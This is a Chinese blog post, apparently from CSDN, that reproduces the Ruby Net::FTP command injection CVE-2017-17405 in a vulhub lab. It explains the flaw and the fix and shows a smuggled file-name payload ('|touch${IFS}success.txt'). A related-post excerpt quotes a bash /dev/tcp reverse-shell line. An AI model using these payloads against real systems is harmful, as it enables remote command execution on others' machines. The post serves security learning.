CVE-2017-17405漏洞复现

最新推荐文章于 2025-06-19 23:21:29 发布
原创 最新推荐文章于 2025-06-19 23:21:29 发布 · 1.4k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #安全 #安全漏洞

没有检索到摘要

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞简述

Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

Net::FTP#get、getbinaryfile、gettextfile、put、putbinaryfile和puttextfile使用Kernel#open打开本地文件。如果localfile参数以管道字符“|”开头,则执行管道字符后面的命令。localfile的默认值是文件.basename(remotefile),因此恶意的FTP服务器可能导致任意命令执行。

影响版本:

Ruby 2.2系列:2.2.8及更早版本

Ruby 2.3系列:2.3.5及更早版本

Ruby 2.4系列:2.4.2及更早版本

Ruby 2.5系列:2.5.0-preview1

在主干修订版r61242之前

修复:

Ruby团队只是用File.open函数替换了open函数,而File.open函数不容易受到命令注入的影响。

二、漏洞复现

本操作使用kali 机为攻击机,ip为192.168.187.134

ubuntu上使用 vulhub为靶机,ip为192.168.187.133

 

在kali机上 打开docker

service docker start

 

在ubuntu 上加载CVE-2017-14015漏洞环境

cd /vulhub-master/ruby/CVE-2017-17405

docker-compose build

docker-compose up -d

在kali运行一个可以访问到FTP客户端。可以使用python运行pyftpdlib,如果没有就可以按照下面的步骤安装使用环境

#安装pyftplid

pip install pyftpdlib

#在当前目录下使用python生成一个ftp服务器,默认监听在0.0.0.0:2121端口。

python -m pyftpdlib -p 2121 -i 0.0.0.0

 

开始利用漏洞。注入命令|touch${IFS}success.txt(空格用${IFS}代替),发送如下数据包即可。

然后在浏览器中会提出文件下载, 保存下载文件

 

在kali中 查看FTP服务器出现的访问记录

然后在ubuntu靶机中运行命令

docker ps -a

进入docker容器,依次执行下列命令,查看已经被保存的success.txt文件

参考链接

https://blog.youkuaiyun.com/weixin_44253823/article/details/102917806

CVE-2017-17405(Ruby Net::FTP 模块命令注入漏洞复现
kriesa的博客
07-13 1313
CVE-2017-17405复现
【春秋云镜】Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)
weixin_44632654的博客
10-17 449
2.4.3之前的Ruby允许Net :: FTP命令注入。
Ruby NetFTP 模块命令注入漏洞CVE-2017-17405
黑白的博客
12-14 1347
声明 好好学习,天天向上 漏洞描述 Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 影响范围 Ruby 2.2系列:2.2.8及更早版本 Ruby 2.3系列:2.3.5及更早版本 Ruby 2.4系列:2.4.2及更早版本 Ruby 2.5系列:2.5.0-preview1 在主干修订版r61242之前 复现
cve2025-24813复现和分析(含靶场搭建)
最新发布
weixin_48152280的博客
06-19 1069
cve2025-24813复现和分析(含靶场搭建)
Ruby Net::FTP 模块命令注入漏洞CVE-2017-17405
EC_Carrot的博客
07-26 495
漏洞简介 Net::FTP是其中的一个FTP客户端的实现。 Ruby 2.4.3之前的版本中的Net::FTP存在命令注入漏洞。在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 漏洞复现 访问http://your-ip:8080/将可以看到一个HTTP服务,其作用是,假如我们访问http://your-ip:8080/download?uri=ftp://examp
Ruby Net::FTP 模块命令注入漏洞CVE-2017-17405漏洞复现
weixin_51804748的博客
01-17 2209
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
CVE-2017-1002101:突破隔离访问宿主机文件系统1
08-03
"Kubernetes 中的 CVE-2017-1002101 漏洞:突破隔离访问宿主机文件系统1" Kubernetes 是一个开源的容器编排系统,用于自动部署、扩展和管理容器化应用程序。然而,Kubernetes 也存在一些安全漏洞CVE-2017-1002101...
漏洞检测CVE-2017-7525---poc
01-20
### 漏洞检测CVE-2017-7525分析与PoC解析 #### 一、漏洞概述 CVE-2017-7525是Apache Struts框架中的一个远程代码执行漏洞。该漏洞允许攻击者通过精心构造的恶意请求来执行远程代码。Apache Struts是一款开源的MVC...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
春秋云境CVE-2017-17405
shr592833253的博客
05-07 522
bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode,最后带入payload对应的位置。复现漏洞需要我们自己起一个ftp服务,这里推荐用python的pyftpdlib,没有安装的小伙伴,可以现在自己的vps上安装一下。burpsuit重放一下请求包,vps成功反弹出shell,拿到flag!值得注意的是,得关注自己的vps有没有开启2121这个端口。,然后再进行urlencode编码,也就是,随后我们进入靶场,发现如下界面。
Ruby NetFTP模块命令注入(CVE-2017-17405)
m0_65150886的博客
01-16 821
Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没有过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。在Ruby 2.2系列的2.2.8及更早版本、Ruby 2.3系列的2.3.5及更早版本、Ruby 2.4系列的2.4.2及更早版本、Ruby 2.5系列的2.5.0-preview1以及在主干修订版r61242之前都存在该漏洞
CVE-2017-17215复现,主要是解决qemu和主机连接问题,后续会继续深入分析该漏洞文件
darui_csdn的博客
08-08 734
一、基本信息: 定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用可能导致远程执行任意代码。该漏洞payload由蜜罐所捕获发现。利用原理是利用upnp服务中的注入漏洞实现任意命令执行。 二、配置复现环境: 1. 安装qemu sudo apt-get install qemu sudo apt-get install qemu-user-static sudo apt-get install qemu-system 2. 网
[漏洞复现]CVE-2017-17010
Vicl1fe的博客
12-19 1589
环境 攻击机:kali2019.04 靶机:windows 7 攻击机IP:192.168.34.80 靶机IP:192.168.34.81 漏洞复现
CVE-2017-15715(Apache解析漏洞)
u014794539的博客
07-25 1159
Apache换行解析漏洞 影响版本:Apache 2.4.0~2.4.29 影响说明:绕过服务器策略,上传webshell 环境说明:PHP5.5 、 Apache2.4.10 漏洞复现利用如下 打开环境即是个文件上传点 先上潮汐看 Apache 百度搜一波 我们利用CVE-2017-15715(Apache换行解析漏洞) 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3829
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
CVE-2017-15715Apache 换行解析漏洞复现
七堇年的博客
03-24 4089
CVE-2017-15715Apache 换行解析漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值